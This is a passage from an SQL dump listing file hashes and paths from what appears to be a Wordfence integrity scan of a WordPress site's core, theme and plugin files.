icall.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'eaeb87d20ccfb7b2da4e307b2ff90e39b7464652','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'eb230f13f89636da80a1485496b420ed069cee9f','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'eb35731e7574a8bb3efc94180bb5d79b57836b19','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'eb3a12c1afc348f325ec0a2de085f306cf7e0f9b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/nexus/cerber-nexus.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'eb8baed300ac4d8fdf4525afc222ae93eefaa5a9','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/api/api.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ebaed98b5002c984f62b54bee0440308c731a3d9','/home/westonspirit.org.uk/public_html/wp-admin/includes/template.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ebccdbbbe5fa2b2b8ef4de8dc7dbc1c9799a3c64','/home/westonspirit.org.uk/public_html/wp-includes/class-phpmailer.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ebfbc95344e607f7872f44c484ed299cb5de340a','/home/westonspirit.org.uk/public_html/wp-includes/query.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ec10aad7d8a844a327014c43e213cb303cafd815','/home/westonspirit.org.uk/public_html/wp-admin/ms-themes.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ec4f4363bbd3f069df6688edaa86ccbf8909f207','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-gallery.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ec563934cd8aa9c198b4f5c28f85d45f3a29a02b','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ecd8a48af8740f004fc20e7673bd26a786dc2ecf','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/flags.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ecdec9310da123aaa8012d293679c0a12742b2ba','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ece8c1fc48e5fd626ccd1b297b4716d78c9ff562','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/kits/documents/tabs/theme-style-form-fields.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ed05f5093dd46da6706196ad2de66b8b45b5b314','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/onboarding/fresh-install.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ed3a277ffb984088406dbebef88fb23a2f266d14','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/template-library/sources/remote.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ed53454d7797f03c76dc9eacd5610d500eabb85e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/PHP52/SplFixedArray.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ed5ff26c255b05794187762258ed196a8694f13d','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ed87e6b0278d6e4085560eaa38bdba8daa7667cc','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/common/status-warning.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ed8acba1ea57fa405105e0b085ff0430b807211c','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'eda02b2428e6ca44f22b83b882e962e8075c2de1','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/header/excerpt-header.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'eda235a6c8ce9cd6ee8f3b34e6ff4113347e634f','/home/westonspirit.org.uk/public_html/index.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'edd23f9d646dc7a44acbc833d6b9bb4b6b3949c5','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/common/modules/connect/admin.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ee0f7cf69d3e7247a2459a2ea06cad47052c101d','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/font.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ee5a6ddeaaccf5a13b9092efceb7ab202ce98125','/home/westonspirit.org.uk/public_html/wp-admin/user/user-edit.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ee5d90743d7d367bb04e30eb692534d1ee2644d1','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Crypto.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ee873a833cccded10ef6915c409bd870f9f188cf','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/files/css/global-css.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ee948533080184c5047d7d42af2f61cd4dd656a3','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ee9b08360396d3da014a4e82fc9fb582b974f3bd','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/kits/documents/tabs/global-colors.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'eebd53dd71b3ee1b4a62ffaf9bbca1654b589e60','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/SodiumException.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'eebf1e65ca410b484ca49c31fc51908414eedd53','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/redirection-front.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'eec6f9f30c96b6e1b358c82de38723bd41fef4f6','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'eee1dac76210db9754423a941c67b45ea8f8b173','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/common/modules/finder/categories/tools.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ef074bd3b177b666dd4a77efb13c6d80a9f06613','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-block-list.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ef276afd4ae998421fc7205da88f90d97a220b33','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/scan-scheduling.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ef2819a1685cfe55eb7330721110d19811d5a931','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/Transport/cURL.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ef317d72338ff82ba2fba93a567f145669dd1592','/home/westonspirit.org.uk/public_html/wp-admin/press-this.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ef4d5bc04db9c5d7ced211b9f7f0ee8c2675aed5','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/image-dimensions.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ef7c42015eaa8e157b0d51abf0fe36eba5d0e807','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/embed.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'efc291952c5d3db837a7fe444b78c06bf3db02ab','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/inc/customizer/core/default.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'efcb0f0f307842f44a54aa4bcc6cbf79909f34f9','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'efce553b2d959713114cf966c70eb9258a5f60bf','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/dynamic-tags/manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'efd9be2016c3fc7dc881c5775207a2e72541133d','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/files/css/post.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'efdbd34bfdc22fbd109e3d70086d61d9aa83f7c0','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/XML/Declaration/Parser.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'efeccde5be0e301751b0aeaea7c4be09f3f869f4','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/landing-pages/module.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'eff4c718a98ed9bf7cd2f1c3bf1dbcbbe08b4aba','/home/westonspirit.org.uk/public_html/wp-content/plugins/akismat/admin.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'effc7be9fceb4967392f322a007b114318f380eb','/home/westonspirit.org.uk/public_html/wp-admin/network/user-edit.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f04086a8e7952205f707e5c6c66d831d32ad3817','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Continent.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f050fccb11b3c5869726376afc63edb7cc112acb','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-base.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f0541aad72613fdd7b124907a8fc67742fbb1640','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-customize-nav-menus.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f056194c1150ba7b42e6dcc0af20ec3706802471','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f0a5494b470f5b341fba8ee0e24978bf7b362128','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/import-export/directories/content.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f0c6163851874026806793649a98161fae7812df','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f0d340905fc714509f3587051b5440188b35fd37','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/lib/namespaced.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f0d6d4da6d866cf283adb8d5ede6fd67df9bb75f','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/dashboard/widget_countries.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f0e55219466c4865ebb1198343c56ea9b51ccd4f','/home/westonspirit.org.uk/public_html/wp-includes/theme.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f0f0631255fe2b5c6713c03009bb6294136cb2e9','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/editor-templates/templates.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f0f694e26b2e747c7701aa3f9a74f1d120dbc339','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/common/unsubscribe.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f12124d95622b52e23267b6019c340c0cd7bc0d2','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/models/firewall/wfFirewall.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f12eebd591b2443d3a98fab29b90685f73034dc5','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/elementor.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f160fed19c49f3ab34c987eafe083bb7d43f0e0b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f172bab41fd18c8cf6401dcfe0da2df733988025','/home/westonspirit.org.uk/public_html/wp-admin/includes/theme-install.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f17b9e251c047b354da52428d30a9de4dda2b98b','/home/westonspirit.org.uk/public_html/wp-includes/class-walker-nav-menu.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f17cffd2ce06eab8910bec6e84ba59f10608ebbc','/home/westonspirit.org.uk/public_html/wp-config-sample.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f1e7495552f5a8ab26366b78e7bddd4311b7a1d1','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f1e86715152d486dc5ae90a7415a07f7c14107a5','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/accordion.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f253e42cc0badaff037bea8973def398f82588ad','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfHelperString.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f29554f6bb7a60043ec5c222a23cfb68737107ba','/home/westonspirit.org.uk/public_html/wp-includes/embed-template.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f2aebb41b91ad2f9c06707c0f8a02b281725cf5b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f2c9382a08c1a5072230bb46691fe63b05f8c1d8','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/common/app.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f2e20dd2af1687a86bf59d90d82a4f7cfe6ff87a','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f305dab11f004523f4caf41647689e262a6d0211','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/section.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f30d71204c74900fa5aadcc2d2024e8a2b041a50','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/page-assets/data-managers/base.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f3738173d3839c8bb93aaf09effea999b3fd0eac','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/404.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f37e8b454b13ee77abaf35d9a3d9cb7e260f3a7c','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/archive.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f3886a8ce608fa3704994dff5de4fb8cd867c27d','/home/westonspirit.org.uk/public_html/wp-admin/network/setup.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f3adf199115bae5029077031a283911de7a75e7b','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-video.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f3c2ab71ec2c671acbef5be8a4feb30cd9ec6f39','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/admin/cerber-tools.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f3dfb6abff94d1c0c6f07b03b9f7deaf533dd8e7','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/site-editor/module.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f40e2b4bb346bf251baf77699018274b884fc783','/home/westonspirit.org.uk/public_html/wp-includes/atomlib.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f413b7cdee23a0cf6672846beb9147aede6c33e2','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-rewrite.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f414947f7caa3eded7acd70395fb37fb18f132c7','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-simplepie-file.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f4293c67f48c0d23eeedf9610c615a8032623e99','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core/Poly1305/State.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f43973b71c3910d3f74d2ea84f9d3c48b727277a','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-database-menu.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f462bf6a148faf7f16d4e1f91fd71d4991a9d95b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfViewResult.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f48a71b918ca0e2d0d5e9a489bcc02727d8f4494','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f48c9ddb918754373f9fed8506114503d7243da5','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/index.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f4c65a3ea99c340338d1756cb4c38e8d70fe07c2','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f4e4cc8164bd91a04c16fbcf975b02559cca0a64','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/inc/post_hooks.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f512367814205e0903d26a1086397c92840fef6a','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/elements/repeater.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f5289bae3d0c169454a7d1ff310ef3ae63608a9a','/home/westonspirit.org.uk/public_html/wp-includes/ID3/module.tag.id3v1.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f54a6163df3d37ac91d2469723e965ec085e03f2','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/HSalsa20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f56884ff1b739a435b87e00e8d34d941cb0e4de3','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/kit-library/data/taxonomies/endpoints/index.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f56f0f50177c0e8696e65f2f663410af0e69d2fd','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-code-editor-control.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f5d6b92bd5ca68b40a41f03cde41eb5c6c4b5bbc','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/waf/pomo/entry.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f5db173f87e10f3e1c5696827e369976be1973bc','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-locked-ip.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f619f36176ce254d39c2511893c65bcae5e61039','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/405.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f620d893c3f1dab9d5d452d590b6e8a96454c87c','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-theme-install-list-table.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f653ca81a9f66c08162bf66751e732dd648e4e3c','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/common.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f655785bfec9472353c86a29f5ab71d89abf04d1','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-dark-mode.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f65583d1410d81399d3ecb55def523a023798543','/home/westonspirit.org.uk/public_html/wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f6b03bb8737f29b488b616958c2e0524c1efc371','/home/westonspirit.org.uk/public_html/wp-admin/includes/continents-cities.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f6b389f86a67347f99737866cb7738f283599ae5','/home/westonspirit.org.uk/public_html/wp-includes/post-formats.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f6b8b4d28045907f13af984fb4829cdb3c03aea6','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/matches/user-agent.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f6d2f8607939919d911a43fd40bab5d874a67eca','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-configure-settings.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f6d2f9fc714b3627280a7e7aa5d179cd8bab9dc7','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Cache/Base.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f6e4f46d69bc85b81f649bb06ced74e6d6422b85','/home/westonspirit.org.uk/public_html/wp-includes/comment-template.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f6eda5e721783e7052ba284148849e448babb1ae','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-image-control.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f6f48c41c80370471c89397b804293744fad1e42','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-custom-background.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f71e4f5fd9586d5092784a2c11579ef10d403411','/home/westonspirit.org.uk/public_html/wp-includes/blocks/rss.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f72882bccd5fd7e63f2f0aae139d49a4e5569ddb','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/settings/base/css-manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f72ad6458425dd6a9dc2c3244ac24c054266587a','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/audio.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f78719db5fc86a7acf47a083491fa4e80d753ae7','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/utils/import-export/parsers/wxr-parser-xml.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f7997b1e13b586e054a14fb7d1d4364ff886e794','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f7ca4a1cb7bf2feeb82de847997c6ed10fada55b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/.htaccess',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f7dafee486de1f3bfa85e47dee7803a71cca9ab5','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Parser.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f82662ac9f9e0af1e6866e7d7b72f6183287220a','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/classes/class-twentynineteen-svg-icons.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f84024bfe9ccfd46b0132365df7a13cb71322de7','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/nexus/cerber-nexus-master.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f84a9da65cd3f0ea123a17f3943bd96fe1e2686d','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/base/base-object.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f84e79af67597d097b41ec8cabc7916a4cbf6a55','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/import-export/directories/wp-content.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f8a089d8649db9d38f3deb0264d66cebe68ec58d','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f8af5a0908d42d5e93b6197a980c004fd565446e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/common/license.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f8e9f87f959dc2dafe076db41c06c7dc1bf6d762','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfCache.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f920a5eeb296bad39413c5d07352e767fb7cab12','/home/westonspirit.org.uk/public_html/wp-admin/export-personal-data.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f952c92834d60ac4fe90acf1c1a6331b7053d625','/home/westonspirit.org.uk/public_html/wp-includes/admin-bar.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f9657983a95e658fc1b998e12d54d292dbed299f','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/common/page-title.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f9753b941288cd8d9bc2ba04c665634424b17009','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/files/uploads-manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f98c889b83134e3a410ca9b42af91717fbb4204f','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-filesystem-ftpsockets.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f99214bd351f5ef468eea149408016592d49f7da','/home/westonspirit.org.uk/public_html/wp-admin/network/site-users.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f993a4ccee0ee294a13d58fa3aa6c29f9a80a69c','/home/westonspirit.org.uk/public_html/wp-signup.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f9ca2a410e76423109d63a20831c7228531545de','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/template-parts/entry-header.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'f9cd151090ea011e29584dae66d45b3e048d5b02','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/functions.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fa4c37142254c6b9c197ef6a0f3175be88d9e374','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/base/background-task.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fa72788d735fc8efe7dd9d53fa68c038ae418f3b','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-block-styles-registry.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fa99664670713b7064f51b6deed999d622d3cbb0','/home/westonspirit.org.uk/public_html/wp-admin/index.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'faccc7550908b61edab17cf79f2894b3272fc318','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/template-parts/content/content-page.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fb2da9974e12979a56aa8c7b882b8b8bf7b02b68','/home/westonspirit.org.uk/public_html/wp-includes/cache.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'fb2eae0c17bfd2fba37a8aba6f64d225b203f266','/home/westonspirit.org.uk/public_html/wp-content/plugin